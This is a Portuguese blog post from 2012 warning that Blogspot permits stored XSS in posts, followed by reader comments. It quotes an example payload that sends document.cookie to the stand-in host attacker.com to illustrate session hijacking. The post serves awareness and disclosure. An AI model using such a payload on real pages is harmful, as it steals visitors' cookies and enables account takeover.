19 de dezembro de 2012

XSS no Blogspot


Há bastante tempo tenho utilizado o meu próprio blog para apresentar uma vulnerabilidade conhecida como Stored XSS.

O blogspot possui uma vulnerabilidade onde é possível, para o administrador de um blog, postar conteúdos com entradas maliciosas que permitem a execução de código javascript no browser de qualquer usuário que visualize aquela postagem específica.

Muita gente gente pensa que o XSS resume-se à execução de um mero "alert" através da entrada 

<script>alert("Hello!");</script>

No entanto, isso é utilizado apenas em demonstrações simples de XSS, mas não é utilizado em ataques que visam obter algum tipo de retorno, como roubar o conteúdo dos cookies do usuário, e através desse conteúdo, realizar um session hijacking, por exemplo.

Quando acessamos um blog, pressupomos que o dono do blog quer compartilhar conteúdo, e não roubar informações ou executar scripts malicioso no browser do usuário, mas nem sempre isso é verdade. Somado à isso, ainda tempos outra situação: quando o blog de alguém é comprometido (basta lembrar do que ocorreu com o blog do Coruja há tempos atrás), e então o atacante insere chamadas maliciosas para a execução de javascript, através das postagens no blog. E o administrador, como não tem o hábito de rever o código HTML de suas postagens antigas (eu mesmo nunca fiz isso), pode deixar passar essa situação, enquanto seus leitores estão sendo atacados.

Precisamos lembrar também, que um ataque do tipo XSS, pode ser completamente transparente para um usuário, pois nada é exibido e apenas dados são roubados, ou operações realizadas (redirecionamento, chamadas à .js maliciosos, clickjacking e etc). Por exemplo, se um atacante injeta o código

<script>document.location=’http://banking.com/search?name=<script>document.write(“<img src=http://attacker.com/” + document.cookie + “>”)</script>’</script>

o usuário não sabe, mas o conteúdo de seus cookies estarão sendo enviados para um outro local e armazenados, simplesmente porque visualizou uma postagem. E se esse código for injetado no início de uma postagem, o simples fato de ver aquele excerto que é exibido na página inicial de blogs que exibem só um trecho da postagem, eles também terão seus cookies comprometidos.

Logo, tomem cuidado com blogs no blogspot.

Já enviei uma msg aos administradores, mas até hj não tive nenhum resposta :-(

3 comentários:

  1. Puxa, como estamos expostos heim Luiz.

    E que bom saber que o Blogspot "está interessado" na segurança do seu próprio serviço :)

    ResponderExcluir
    Respostas
    1. Para vermos que mesmo sendo tão grande como o Google, segurança nem sempre vem em primeiro lugar :-)

      Excluir
  2. É verdade. E só para comentar, isso não acontece apenas na área de TI, acontece em outras também:

    Há aproximadamente duas semanas, aqui em Sorocaba, caiu uma parede de 10m encima de uns 4 carros e uma moto - todos estavam com pessoas dirigindo. Essa parede era de um antigo prédio onde estava sendo construído um novo shopping. Os engenheiros disseram que a parede estava segura, e não precisava de escoramento. Bastou uma tempetade e pronto..

    No final das contas, 7 pessoas morreram e um ficou ferido. E dois meses antes um amador filmou o local e disse que poderia cair aquela parede e ferir as pessoas, mas, como aconteceu com você, ninguém deu bola e deu no que deu.

    #SóDeus!

    ResponderExcluir